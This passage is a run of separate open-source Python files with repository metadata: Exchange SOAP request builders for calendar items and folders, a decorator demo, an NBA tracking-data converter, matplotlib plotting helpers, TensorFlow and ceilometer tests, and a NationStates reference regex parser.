format controls how much data you get back from Exchange. Full docs are here, but acceptible values
are IdOnly, Default, and AllProperties.
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="{exchange_id}"/>
</m:ItemIds>
</m:GetItem>
"""
elements = list()
if type(exchange_id) == list:
for item in exchange_id:
elements.append(T.ItemId(Id=item))
else:
elements = [T.ItemId(Id=exchange_id)]
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds(
*elements
)
)
return root
def get_calendar_items(format=u"Default", start=None, end=None, max_entries=999999):
start = start.strftime(EXCHANGE_DATETIME_FORMAT)
end = end.strftime(EXCHANGE_DATETIME_FORMAT)
root = M.FindItem(
{u'Traversal': u'Shallow'},
M.ItemShape(
T.BaseShape(format)
),
M.CalendarView({
u'MaxEntriesReturned': _unicode(max_entries),
u'StartDate': start,
u'EndDate': end,
}),
M.ParentFolderIds(T.DistinguishedFolderId(Id=u"calendar")),
)
return root
def get_master(exchange_id, format=u"Default"):
"""
Requests a calendar item from the store.
exchange_id is the id for this event in the Exchange store.
format controls how much data you get back from Exchange. Full docs are here, but acceptible values
are IdOnly, Default, and AllProperties.
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:RecurringMasterItemId OccurrenceId="{exchange_id}"/>
</m:ItemIds>
</m:GetItem>
"""
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds(
T.RecurringMasterItemId(OccurrenceId=exchange_id)
)
)
return root
def get_occurrence(exchange_id, instance_index, format=u"Default"):
"""
Requests one or more calendar items from the store matching the master & index.
exchange_id is the id for the master event in the Exchange store.
format controls how much data you get back from Exchange. Full docs are here, but acceptible values
are IdOnly, Default, and AllProperties.
GetItem Doc:
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
OccurrenceItemId Doc:
http://msdn.microsoft.com/en-us/library/office/aa580744(v=exchg.150).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
{% for index in instance_index %}
<t:OccurrenceItemId RecurringMasterId="{exchange_id}" InstanceIndex="{{ index }}"/>
{% endfor %}
</m:ItemIds>
</m:GetItem>
"""
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds()
)
items_node = root.xpath("//m:ItemIds", namespaces=NAMESPACES)[0]
for index in instance_index:
items_node.append(T.OccurrenceItemId(RecurringMasterId=exchange_id, InstanceIndex=str(index)))
return root
def get_folder(folder_id, format=u"Default"):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.GetFolder(
M.FolderShape(
T.BaseShape(format)
),
M.FolderIds(id)
)
return root
def new_folder(folder):
id = T.DistinguishedFolderId(Id=folder.parent_id) if folder.parent_id in DISTINGUISHED_IDS else T.FolderId(Id=folder.parent_id)
if folder.folder_type == u'Folder':
folder_node = T.Folder(T.DisplayName(folder.display_name))
elif folder.folder_type == u'CalendarFolder':
folder_node = T.CalendarFolder(T.DisplayName(folder.display_name))
root = M.CreateFolder(
M.ParentFolderId(id),
M.Folders(folder_node)
)
return root
def find_folder(parent_id, format=u"Default"):
id = T.DistinguishedFolderId(Id=parent_id) if parent_id in DISTINGUISHED_IDS else T.FolderId(Id=parent_id)
root = M.FindFolder(
{u'Traversal': u'Shallow'},
M.FolderShape(
T.BaseShape(format)
),
M.ParentFolderIds(id)
)
return root
def delete_folder(folder):
root = M.DeleteFolder(
{u'DeleteType': 'HardDelete'},
M.FolderIds(
T.FolderId(Id=folder.id)
)
)
return root
def new_event(event):
"""
Requests a new event be created in the store.
http://msdn.microsoft.com/en-us/library/aa564690(v=exchg.140).aspx
<m:CreateItem SendMeetingInvitations="SendToAllAndSaveCopy"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:SavedItemFolderId>
<t:DistinguishedFolderId Id="calendar"/>
</m:SavedItemFolderId>
<m:Items>
<t:CalendarItem>
<t:Subject>{event.subject}</t:Subject>
<t:Body BodyType="HTML">{event.subject}</t:Body>
<t:Start></t:Start>
<t:End></t:End>
<t:Location></t:Location>
<t:RequiredAttendees>
{% for attendee_email in meeting.required_attendees %}
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
HTTPretty {% endfor %}
</t:RequiredAttendees>
{% if meeting.optional_attendees %}
<t:OptionalAttendees>
{% for attendee_email in meeting.optional_attendees %}
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
{% endfor %}
</t:OptionalAttendees>
{% endif %}
{% if meeting.conference_room %}
<t:Resources>
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ meeting.conference_room.email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
</t:Resources>
{% endif %}
</t:CalendarItem>
</m:Items>
</m:CreateItem>
"""
id = T.DistinguishedFolderId(Id=event.calendar_id) if event.calendar_id in DISTINGUISHED_IDS else T.FolderId(Id=event.calendar_id)
start = convert_datetime_to_utc(event.start)
end = convert_datetime_to_utc(event.end)
root = M.CreateItem(
M.SavedItemFolderId(id),
M.Items(
T.CalendarItem(
T.Subject(event.subject),
T.Body(event.body or u'', BodyType="HTML"),
)
),
SendMeetingInvitations="SendToAllAndSaveCopy"
)
calendar_node = root.xpath(u'/m:CreateItem/m:Items/t:CalendarItem', namespaces=NAMESPACES)[0]
if event.reminder_minutes_before_start:
calendar_node.append(T.ReminderIsSet('true'))
calendar_node.append(T.ReminderMinutesBeforeStart(str(event.reminder_minutes_before_start)))
else:
calendar_node.append(T.ReminderIsSet('false'))
calendar_node.append(T.Start(start.strftime(EXCHANGE_DATETIME_FORMAT)))
calendar_node.append(T.End(end.strftime(EXCHANGE_DATETIME_FORMAT)))
if event.is_all_day:
calendar_node.append(T.IsAllDayEvent('true'))
calendar_node.append(T.Location(event.location or u''))
if event.required_attendees:
calendar_node.append(resource_node(element=T.RequiredAttendees(), resources=event.required_attendees))
if event.optional_attendees:
calendar_node.append(resource_node(element=T.OptionalAttendees(), resources=event.optional_attendees))
if event.resources:
calendar_node.append(resource_node(element=T.Resources(), resources=event.resources))
if event.recurrence:
if event.recurrence == u'daily':
recurrence = T.DailyRecurrence(
T.Interval(str(event.recurrence_interval)),
)
elif event.recurrence == u'weekly':
recurrence = T.WeeklyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DaysOfWeek(event.recurrence_days),
)
elif event.recurrence == u'monthly':
recurrence = T.AbsoluteMonthlyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DayOfMonth(str(event.start.day)),
)
elif event.recurrence == u'yearly':
recurrence = T.AbsoluteYearlyRecurrence(
T.DayOfMonth(str(event.start.day)),
T.Month(event.start.strftime("%B")),
)
calendar_node.append(
T.Recurrence(
recurrence,
T.EndDateRecurrence(
T.StartDate(event.start.strftime(EXCHANGE_DATE_FORMAT)),
T.EndDate(event.recurrence_end_date.strftime(EXCHANGE_DATE_FORMAT)),
)
)
)
return root
def delete_event(event):
"""
Requests an item be deleted from the store.
<DeleteItem
xmlns="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
DeleteType="HardDelete"
SendMeetingCancellations="SendToAllAndSaveCopy"
AffectedTaskOccurrences="AllOccurrences">
<ItemIds>
<t:ItemId Id="{{ id }}" ChangeKey="{{ change_key }}"/>
</ItemIds>
</DeleteItem>
"""
root = M.DeleteItem(
M.ItemIds(
T.ItemId(Id=event.id, ChangeKey=event.change_key)
),
DeleteType="HardDelete",
SendMeetingCancellations="SendToAllAndSaveCopy",
AffectedTaskOccurrences="AllOccurrences"
)
return root
def move_event(event, folder_id):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.MoveItem(
M.ToFolderId(id),
M.ItemIds(
T.ItemId(Id=event.id, ChangeKey=event.change_key)
)
)
return root
def move_folder(folder, folder_id):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.MoveFolder(
M.ToFolderId(id),
M.FolderIds(
T.FolderId(Id=folder.id)
)
)
return root
def update_property_node(node_to_insert, field_uri):
""" Helper function - generates a SetItemField which tells Exchange you want to overwrite the contents of a field."""
root = T.SetItemField(
T.FieldURI(FieldURI=field_uri),
T.CalendarItem(node_to_insert)
)
return root
def update_item(event, updated_attributes, calendar_item_update_operation_type):
""" Saves updates to an event in the store. Only request changes for attributes that have actually changed."""
root = M.UpdateItem(
M.ItemChanges(
T.ItemChange(
T.ItemId(Id=event.id, ChangeKey=event.change_key),
T.Updates()
)
),
ConflictResolution=u"AlwaysOverwrite",
MessageDisposition=u"SendAndSaveCopy",
SendMeetingInvitationsOrCancellations=calendar_item_update_operation_type
)
update_node = root.xpath(u'/m:UpdateItem/m:ItemChanges/t:ItemChange/t:Updates', namespaces=NAMESPACES)[0]
# if not send_only_to_changed_attendees:
# # We want to resend invites, which you do by setting an attribute to the same value it has. Right now, events
# # are always scheduled as Busy time, so we just set that again.
# update_node.append(
# update_property_node(field_uri="calendar:LegacyFreeBusyStatus", node_to_insert=T.LegacyFreeBusyStatus("Busy"))
# )
if u'html_body' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Body", node_to_insert=T.Body(event.html_body, BodyType="HTML"))
)
if u'text_body' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Body", node_to_insert=T.Body(event.text_body, BodyType="Text"))
)
if u'subject' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Subject", node_to_insert=T.Subject(event.subject))
)
if u'start' in updated_attributes:
start = convert_datetime_to_utc(event.start)
update_node.append(
update_property_node(field_uri="calendar:Start", node_to_insert=T.Start(start.strftime(EXCHANGE_DATETIME_FORMAT)))
)
if u'end' in updated_attributes:
end = convert_datetime_to_utc(event.end)
update_node.append(
update_property_node(field_uri="calendar:End", node_to_insert=T.End(end.strftime(EXCHANGE_DATETIME_FORMAT)))
)
if u'location' in updated_attributes:
update_node.append(
update_property_node(field_uri="calendar:Location", node_to_insert=T.Location(event.location))
)
if u'online_meeting' in updated_attributes:
print "Not yet Implemented"
pass
if u'attendees' in updated_attributes:
if event.required_attendees:
required = resource_node(element=T.RequiredAttendees(), resources=event.required_attendees)
update_node.append(
update_property_node(field_uri="calendar:RequiredAttendees", node_to_insert=required)
)
else:
update_node.append(delete_field(field_uri="calendar:RequiredAttendees"))
if event.optional_attendees:
optional = resource_node(element=T.OptionalAttendees(), resources=event.optional_attendees)
update_node.append(
update_property_node(field_uri="calendar:OptionalAttendees", node_to_insert=optional)
)
else:
update_node.append(delete_field(field_uri="calendar:OptionalAttendees"))
if u'resources' in updated_attributes:
if event.resources:
resources = resource_node(element=T.Resources(), resources=event.resources)
update_node.append(
update_property_node(field_uri="calendar:Resources", node_to_insert=resources)
)
else:
update_node.append(delete_field(field_uri="calendar:Resources"))
if u'reminder_minutes_before_start' in updated_attributes:
if event.reminder_minutes_before_start:
update_node.append(
update_property_node(field_uri="item:ReminderIsSet", node_to_insert=T.ReminderIsSet('true'))
)
update_node.append(
update_property_node(
field_uri="item:ReminderMinutesBeforeStart",
node_to_insert=T.ReminderMinutesBeforeStart(str(event.reminder_minutes_before_start))
)
)
else:
update_node.append(
update_property_node(field_uri="item:ReminderIsSet", node_to_insert=T.ReminderIsSet('false'))
)
if u'is_all_day' in updated_attributes:
update_node.append(
update_property_node(field_uri="calendar:IsAllDayEvent", node_to_insert=T.IsAllDayEvent(str(event.is_all_day).lower()))
)
for attr in event.RECURRENCE_ATTRIBUTES:
if attr in updated_attributes:
recurrence_node = T.Recurrence()
if event.recurrence == 'daily':
recurrence_node.append(
T.DailyRecurrence(
T.Interval(str(event.recurrence_interval)),
)
)
elif event.recurrence == 'weekly':
recurrence_node.append(
T.WeeklyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DaysOfWeek(event.recurrence_days),
)
)
elif event.recurrence == 'monthly':
recurrence_node.append(
T.AbsoluteMonthlyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DayOfMonth(str(event.start.day)),
)
)
elif event.recurrence == 'yearly':
recurrence_node.append(
T.AbsoluteYearlyRecurrence(
T.DayOfMonth(str(event.start.day)),
T.Month(event.start.strftime("%B")),
)
)
recurrence_node.append(
T.EndDateRecurrence(
T.StartDate(event.start.strftime(EXCHANGE_DATE_FORMAT)),
T.EndDate(event.recurrence_end_date.strftime(EXCHANGE_DATE_FORMAT)),
)
)
update_node.append(
update_property_node(field_uri="calendar:Recurrence", node_to_insert=recurrence_node)
)
return root
| {
"content_hash": "95dd76d7d1d8eda603bd58451bdaf11a",
"timestamp": "",
"source": "github",
"line_count": 618,
"max_line_length": 212,
"avg_line_length": 31.0873786407767,
"alnum_prop": 0.6567249635644389,
"repo_name": "jeeftor/alfredToday",
"id": "c95ec305b50d92a1325e14bd62759e4edf6f2a45",
"size": "19212",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/lib/pyexchange/exchange2010/soap_request.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "HTML",
"bytes": "9541"
},
{
"name": "Python",
"bytes": "3016339"
},
{
"name": "Shell",
"bytes": "1057"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
"""
# decorator_run.py
#
# Copyright(C) by AbsentM. 2018
#
# Author: AbsentM
# Date: 2018/02/10
#
# Description:
# Use decorator function to execute simple run flow.
#
# decorator_run.py == simple_sun.py
#
"""
def wrapper(func):
"""
Define a wrapper function, and use function as params.
:param func: A function as param
:return: A new function
"""
def inner_func(*args, **kwargs):
"""
A real inner function to run parammter function.
:param args: default args
:param kwargs: default more args
:return: None
"""
print "Entering function "
func(*args, **kwargs)
print "Exiting function"
return inner_func
@wrapper
def show_message():
"""
Define a function to show some info msg.
:return: None
"""
print "Hello everyone!"
def decorator_main_run():
"""
Main test function
:return: None
"""
print "----------------------------------"
show_message()
print "----------------------------------"
if __name__ == '__main__':
decorator_main_run() | {
"content_hash": "f43ccfc654f05266249d7c6f60a98835",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 56,
"avg_line_length": 17.666666666666668,
"alnum_prop": 0.5978152929493545,
"repo_name": "absentm/Demo",
"id": "eeb5be6640152f7e3b9365669884b28a63e93be5",
"size": "1023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python-demo/decorator-demo/decorator_run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5500"
},
{
"name": "Go",
"bytes": "76"
},
{
"name": "HTML",
"bytes": "16708"
},
{
"name": "Java",
"bytes": "294904"
},
{
"name": "JavaScript",
"bytes": "24993"
},
{
"name": "Python",
"bytes": "73632"
},
{
"name": "Shell",
"bytes": "15108"
},
{
"name": "Vue",
"bytes": "6943"
}
],
"symlink_target": ""
} |
import pandas
import os
import sys
import json
import movement.config as CONFIG
data_path = CONFIG.data.dir
csv_path = CONFIG.data.movement.dir
files = os.listdir(data_path)
if not os.path.exists(csv_path):
os.makedirs(csv_path)
count = 0
movement_headers = ["team_id", "player_id", "x_loc", "y_loc", "radius", "game_clock", "shot_clock", "quarter", "game_id",
"event_id"]
for file in files:
if '.json' not in file:
continue
try:
count = count + 1
file_data = open('%s/%s' % (data_path, file))
game_id = file.replace('.json', '')
data = json.load(file_data)
events = data['events']
moments = []
for event in events:
event_id = event['eventId']
movement_data = event['moments']
for moment in movement_data:
for player in moment[5]:
player.extend((moment[2], moment[3], moment[0], game_id, event_id))
moments.append(player)
# movement frame is complete for game
movement = pandas.DataFrame(moments, columns=movement_headers)
movement.to_csv('%s/%s.csv' % (csv_path, game_id), index=False)
# movement.to_json('./data/json/' + game_id + '.json', orient='records')
print '\n'
print '\n'
print 'Finished collecting dataframe for Game ID: ' + game_id
print 'Completed : ' + str(count) + ' games.'
except Exception as e:
print 'Error in loading: ' + str(file) + ' file, Error: ' + str(e)
print '\n'
print '\n'
print 'Finished collecting dataframes for all games.'
print str(count) + ' games counted'
| {
"content_hash": "48b3c36efc3a26bf0615edf9ba386909",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 121,
"avg_line_length": 32,
"alnum_prop": 0.5793269230769231,
"repo_name": "sealneaward/nba-movement-data",
"id": "2d717e6348e6f973518177e9aeee9c14a309889f",
"size": "1664",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "movement/json_to_csv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14593"
},
{
"name": "Shell",
"bytes": "78"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function
import six
import numpy as np
import copy
from matplotlib.collections import LineCollection
from matplotlib.colors import ListedColormap, BoundaryNorm
from matplotlib.ticker import NullLocator
def mark_region(ax, low, high, vline_style, span_style):
"""
Mark a region of a graph with vertical lines and an axvspan
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
low, high : float
The low and high threshold values, points for `low < x < high` are
styled using `inner_style` and points for `x < low or x > high` are
styled using `outer_style`
vline_style : dict, optional
The style to use for the vertical lines
span_stlye : dict, optional
Style for axvspan behind central region
Returns
-------
vline_low, vline_hi : Line2D
Vertical lines at the thresholds
hspan : Patch
Patch over middle region
"""
# add vertical lines
vline_low = ax.axvline(low, **vline_style)
vline_high = ax.axvline(high, **vline_style)
hspan = ax.axvspan(low, high, **span_style)
return vline_low, vline_high, hspan
def split_plot(ax, x, y, low, high, inner_style, outer_style):
"""
Split styling of line based on the x-value
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
x, y : ndarray
Data, must be same length
low, high : float
The low and high threshold values, points for `low < x < high` are
styled using `inner_style` and points for `x < low or x > high` are
styled using `outer_style`
inner_style, outer_style : dict
Dictionary of styles that can be passed to `ax.plot`
Returns
-------
lower, mid, upper : Line2D
The artists for the lower, midddle, and upper ranges
"""
low_mask = x < low
high_mask = x > high
mid_mask = ~np.logical_or(low_mask, high_mask)
low_mask[1:] |= low_mask[:-1]
high_mask[:-1] |= high_mask[1:]
lower, = ax.plot(x[low_mask], y[low_mask], **outer_style)
mid, = ax.plot(x[mid_mask], y[mid_mask], **inner_style)
upper, = ax.plot(x[high_mask], y[high_mask], **outer_style)
return lower, mid, upper
def show_label_array(ax, label_array, cmap=None, **kwargs):
"""
Display a labeled array nicely
Additional kwargs are passed through to `ax.imshow`.
If `vmin` is in kwargs, it is clipped to minimum of 0.5.
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
label_array : ndarray
Expected to be an unsigned integer array. 0 is background,
positive integers label region of interent
cmap : str or colormap, optional
Color map to use, defaults to 'Paired'
Returns
-------
img : AxesImage
The artist added to the axes
"""
if cmap is None:
cmap = 'Paired'
_cmap = copy.copy((mcm.get_cmap(cmap)))
_cmap.set_under('w', 0)
vmin = max(.5, kwargs.pop('vmin', .5))
ax.set_aspect('equal')
im = ax.imshow(label_array, cmap=_cmap,
interpolation='nearest',
vmin=vmin,
**kwargs)
return im
def binary_state_lines(ax, data, xmin, xmax,
delta_y=3,
off_color=None,
on_color=None,
lc_kwargs=None):
"""
Draw series of lines indicating the state of (many) indicators.
Parameters
----------
ax : Axes
The axes to draw stuff to
data : OrderedDict
The data as an ordered dict. The keys will be used as ytick labels
keyed on the data label. The values are a list of edge pairs where
the value is 'high'; ex ``data[k] = [(1, 2), (3, 5.5)]`` is 'high' in
the ranges 1 to 2 and 3 to 5.5 and 'low' everywhere else.
The lines are drawn in order from the top down.
xmin, xmax : float
The minimum and maximum limits for the x values
delta_y : float, optional
The spacing between lines
off_color, on_color : color, optional
The colors to use for the the off/on state.
Default to "#1C2F4D" (blueish) and "#FA9B00" (yellowish) respectively
lc_kwargs : dict, optional
kwargs to pass through the the LineCollection init method. If not
given defaults to ``{'lw': 10}``
Returns
-------
ret : dict
dictionary of the collections added keyed on the label
"""
if lc_kwargs is None:
lc_kwargs = dict()
if 'lw' not in lc_kwargs:
lc_kwargs['lw'] = 10
if off_color is None:
off_color = "#1C2F4D"
if on_color is None:
on_color = "#FA9B00"
# base offset
y_val = 0
# make the color map and norm
cmap = ListedColormap([off_color, on_color])
norm = BoundaryNorm([0, 0.5, 1], cmap.N)
# dictionary to hold the returned artists
ret = dict()
# loop over the input data draw each collection
for label, d in data.items():
# increment the y offset
y_val += delta_y
# turn the high windows on to alternating
# high/low regions
x = np.asarray(d).ravel()
# assign the high/low state to each one
state = np.mod(1 + np.arange(len(x)), 2)
# deal with boundary conditions to be off
# at start/end
if x[0] > xmin:
x = np.r_[xmin, x]
state = np.r_[0, state]
if x[-1] < xmax:
x = np.r_[x, xmax]
state = np.r_[state, 0]
# make the matching y values
y = np.ones(len(x)) * y_val
# call helper function to create the collection
coll = _draw_segments(ax, x, y, state,
cmap, norm, lc_kwargs)
ret[label] = coll
# set up the axes limits
ax.set_xlim(xmin, xmax)
ax.set_ylim(0, y_val + delta_y)
# turn off x-ticks
ax.xaxis.set_major_locator(NullLocator())
# make the y-ticks be labeled as per the input
ax.yaxis.set_ticks((1 + np.arange(len(data))) * delta_y)
ax.yaxis.set_ticklabels(list(data.keys()))
# invert so that the first data is at the top
ax.invert_yaxis()
# turn off the frame and patch
ax.set_frame_on(False)
# return the added artists
return ret
def _draw_segments(ax, x, y, state, cmap, norm, lc_kwargs):
"""
helper function to turn boundary edges into the input LineCollection
expects.
Parameters
----------
ax : Axes
The axes to draw to
x, y, state : array
The x edges, the y values and the state of each region
cmap : matplotlib.colors.Colormap
The color map to use
norm : matplotlib.ticker.Norm
The norm to use with the color map
lc_kwargs : dict
kwargs to pass through to LineCollection
"""
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, cmap=cmap, norm=norm, **lc_kwargs)
lc.set_array(state)
ax.add_collection(lc)
return lc
| {
"content_hash": "153447e0a94151bb9b0edfa9feb38074",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 77,
"avg_line_length": 27.83783783783784,
"alnum_prop": 0.591123439667129,
"repo_name": "sameera2004/xray-vision",
"id": "090deaf1561b9cbb45cea0af6f88db19e5bb6cf7",
"size": "7210",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "xray_vision/mpl_plotting/misc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "315279"
},
{
"name": "Shell",
"bytes": "39"
}
],
"symlink_target": ""
} |
"""Tests for `tf.data.experimental.assert_cardinality()`."""
from absl.testing import parameterized
from tensorflow.python.data.experimental.ops import cardinality
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.framework import combinations
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
class AssertCardinalityTest(test_base.DatasetTestBase, parameterized.TestCase):
"""Tests for `tf.data.experimental.assert_cardinality()`."""
@combinations.generate(test_base.default_test_combinations())
def testCorrectCardinality(self):
dataset = dataset_ops.Dataset.range(10).filter(lambda x: True)
self.assertEqual(
self.evaluate(cardinality.cardinality(dataset)), cardinality.UNKNOWN)
self.assertDatasetProduces(dataset, expected_output=range(10))
dataset = dataset.apply(cardinality.assert_cardinality(10))
self.assertEqual(self.evaluate(cardinality.cardinality(dataset)), 10)
self.assertDatasetProduces(dataset, expected_output=range(10))
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
num_elements=10,
asserted_cardinality=20,
expected_error="Input dataset was expected to contain 20 "
"elements but contained only 10 elements.") +
combinations.combine(
num_elements=1,
asserted_cardinality=20,
expected_error="Input dataset was expected to contain 20 "
"elements but contained only 1 element.") +
combinations.combine(
num_elements=10,
asserted_cardinality=cardinality.INFINITE,
expected_error="Input dataset was expected to contain an "
"infinite number of elements but contained only 10 elements.") +
combinations.combine(
num_elements=1,
asserted_cardinality=cardinality.INFINITE,
expected_error="Input dataset was expected to contain an "
"infinite number of elements but contained only 1 element.") +
combinations.combine(
num_elements=10,
asserted_cardinality=5,
expected_error="Input dataset was expected to contain 5 "
"elements but contained at least 6 elements.") +
combinations.combine(
num_elements=10,
asserted_cardinality=1,
expected_error="Input dataset was expected to contain 1 "
"element but contained at least 2 elements.")))
def testIncorrectCardinality(self, num_elements, asserted_cardinality,
expected_error):
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
cardinality.assert_cardinality(asserted_cardinality))
get_next = self.getNext(dataset)
with self.assertRaisesRegex(errors.FailedPreconditionError, expected_error):
while True:
self.evaluate(get_next())
class AssertCardinalityCheckpointTest(checkpoint_test_base.CheckpointTestBase,
parameterized.TestCase):
def build_dataset(self, num_elements, options=None):
dataset = dataset_ops.Dataset.range(num_elements).apply(
cardinality.assert_cardinality(num_elements))
if options:
dataset = dataset.with_options(options)
return dataset
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(symbolic_checkpoint=[False, True])))
def test(self, verify_fn, symbolic_checkpoint):
options = options_lib.Options()
options.experimental_symbolic_checkpoint = symbolic_checkpoint
verify_fn(self, lambda: self.build_dataset(200, options), num_outputs=200)
if __name__ == "__main__":
test.main()
| {
"content_hash": "5ec993335507c653cb5ceb8efe134a57",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 80,
"avg_line_length": 44.645161290322584,
"alnum_prop": 0.683766859344894,
"repo_name": "paolodedios/tensorflow",
"id": "1a226418c476f88ccf41db32e510194ffdfa3a93",
"size": "4841",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/data/experimental/kernel_tests/assert_cardinality_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1387968"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "125994873"
},
{
"name": "CMake",
"bytes": "182324"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11402294"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300208"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42775737"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621520"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7727119"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""Tests for ceilometer/central/manager.py
"""
import mock
from ceilometer.central import manager
from ceilometer.openstack.common.fixture import mockpatch
from ceilometer.openstack.common import test
from ceilometer.tests import agentbase
class TestManager(test.BaseTestCase):
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def test_load_plugins(self):
mgr = manager.AgentManager()
self.assertIsNotNone(list(mgr.pollster_manager))
class TestRunTasks(agentbase.BaseAgentManagerTestCase):
def setup_manager(self):
self.mgr = manager.AgentManager()
def setUp(self):
super(TestRunTasks, self).setUp()
self.useFixture(mockpatch.Patch(
'keystoneclient.v2_0.client.Client',
return_value=None))
| {
"content_hash": "58fb7f587c745dab92c74e91381c7189",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 71,
"avg_line_length": 27.517241379310345,
"alnum_prop": 0.7230576441102757,
"repo_name": "rackerlabs/instrumented-ceilometer",
"id": "573c73aebb5d177b4ad8add8d6b9997a6b41f812",
"size": "1451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/tests/central/test_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "149656"
},
{
"name": "JavaScript",
"bytes": "361114"
},
{
"name": "Python",
"bytes": "1897887"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
} |
import re
NATION_REGEX = re.compile("@@([^@]{0,40})@@")
REGION_REGEX = re.compile("%%([^%]{0,40})%%")
def parse_nation(s):
"""Accepts a string, and outputs the nations referenced
if it can find them"""
return NATION_REGEX.findall(s)
def parse_region(s):
"""Accepts a string, and outputs the regions referenced
if it can find them"""
return REGION_REGEX.findall(s)
| {
"content_hash": "b1958bd51c46a076d488e772dab2a46d",
"timestamp": "",
